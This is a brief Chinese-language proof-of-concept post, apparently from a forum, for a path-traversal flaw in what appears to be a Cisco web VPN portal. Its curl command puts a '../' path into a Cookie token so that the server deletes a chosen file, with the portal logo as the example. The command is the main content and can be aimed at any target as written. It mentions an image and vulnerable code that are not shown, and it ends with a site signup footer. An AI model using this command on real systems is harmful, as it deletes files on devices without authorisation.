POC
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
https://target/+CSCOE+/session_password.html
返回 200,即证明存在该漏洞。
在 cookie 传写入删除的文件,以页面中 ciso 图片为例子:
也就是,https://target/+CSCOU+/csco_logo.gif
在 cookie 中写入 token=../+CSCOU+/csco_logo.gif
如上图所示,删除掉 ciso logo 图片。
漏洞代码如下:
欢迎来到这里!
我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。
注册 关于